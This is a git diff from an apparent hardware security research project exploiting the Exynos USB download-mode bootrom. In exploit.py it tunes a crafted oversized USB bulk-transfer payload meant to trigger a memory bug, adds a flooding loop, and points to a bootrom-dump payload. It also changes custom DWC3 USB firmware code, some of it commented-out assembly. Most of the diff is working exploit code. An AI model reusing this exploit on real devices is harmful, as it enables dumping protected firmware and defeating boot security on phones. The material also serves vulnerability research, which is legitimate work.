diff --git a/dwc3.bin b/dwc3.bin index e800078..2a61d94 100755 Binary files a/dwc3.bin and b/dwc3.bin differ diff --git a/dwc3.elf b/dwc3.elf index 61b2b6f..2bf5e44 100755 Binary files a/dwc3.elf and b/dwc3.elf differ diff --git a/dwc3.o b/dwc3.o index aff8e12..a372f27 100644 Binary files a/dwc3.o and b/dwc3.o differ diff --git a/exploit.py b/exploit.py index 0275fd9..a81e53d 100644 --- a/exploit.py +++ b/exploit.py @@ -82,7 +82,7 @@ class ExynosDevice(): # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE) transferred = ctypes.c_int() - bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) + bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload)) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0) assert res == 0 @@ -91,8 +91,10 @@ class ExynosDevice(): res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) assert res == 0 - payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200)) + payload = b"\xaa" * 0x200 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) + while True: + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10) pass def test_bug(self): @@ -278,6 +280,7 @@ if __name__ == "__main__": # wait_for_device() exynos = ExynosDevice() exynos.test_bug_2() + sys.exit(0) path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin" # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin" exynos.exploit(open(path, "rb").read()) diff --git a/test_dwc3.c b/test_dwc3.c index eb14a87..d39f0b2 100644 --- a/test_dwc3.c +++ b/test_dwc3.c @@ -10,25 +10,16 @@ extern void sleep(int endpoint,uint32_t timeout); #define recv_buffer 0x02021800 + 0x2000 #define data_received 0x02021800 + 0x2004 -// do { -// /* loops until image has been received */ -// usb_event_handler(); -// iVar2 = download_ready?(); #TODO, set some global to indicate readyness -// } while (iVar2 == 0); - void recv_data_cb(uint32_t endpoint, uint32_t len){ void *rbuf; void *dest_buf = (void *)recv_buffer; volatile void *dref = (void *)data_received; + rbuf = get_endpoint_buffer(endpoint); for(int i= 0; i < len; i++){ - rbuf = get_endpoint_buffer(2); *(char *)dest_buf = *(char *)(void *)((int)rbuf + i); } - // while(1){} - // asm("mov x0, #0x0"); - // asm("br x0"); - *(uint8_t *)dref = 3; + *(uint8_t *)dref = 1; // Mark as ready } void recv_data(){ @@ -38,18 +29,61 @@ void recv_data(){ volatile void *dref = (void *)data_received; *(uint8_t *)dref = 0; - maybe_usb_setup_read(2, recv_data_cb, 1); + maybe_usb_setup_read(2, recv_data_cb, 0x200); + void *rbuf = get_endpoint_buffer(2); + dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200); while(1){ usb_event_handler(); - if(*(uint8_t *)dref == 3){ + if(*(uint8_t *)dref == 1){ break; } - sleep(1, 10); } } +void send_data(uint32_t *address, uint32_t size) +{ + // asm("stp x29, x30, [sp,#-48]!");; + // asm("mov w3, #0x0"); + // asm("bfxil w3, w1, #0, #24"); + // asm("mov w1, #0xc12"); + // asm("mov x29, sp"); + // asm("stp x19, x20, [sp,#16]"); + // asm("mov x5, #0xc834"); + // asm("mov w20, #0x1"); + // asm("movk x5, #0x1540, lsl #16"); + // asm("ldr x2, [x29,#40]"); + // asm("mov x4, #0xc838"); + // asm("orr w6, w1, w20"); + // asm("movk x4, #0x1540, lsl #16"); + // asm("mov x19, #0xc83c"); + // asm("movk x19, #0x1540, lsl #16"); + // asm("stp w3, w1, [x2,#8]"); + // asm("mov w3, #0x406"); + // asm("stp w0, wzr, [x2]"); + // asm("mov w0, w20"); + // asm("ldr x1, [x29,#40]"); + // asm("strb w6, [x2,#12]"); + // asm("mov x2, #0x27c8"); + // asm("str w1, [x5]"); + // asm("mov w1, #0x1388"); + // asm("str wzr, [x4]"); + // asm("str w3, [x19]"); + // asm("blr x2"); + // asm("mov w0, w20"); + // asm("ldr w1, [x19]"); + // asm("ldp x19, x20, [sp,#16]"); + // asm("ldp x29, x30, [sp],#48"); + // asm("ret"); +} + int main() { - recv_data(); + while(1){ + recv_data(); + send_data((uint32_t *) recv_buffer, 0x200); + } + + + // recv_data(); // sleep(1, 5000); asm("mov x0, #0x0");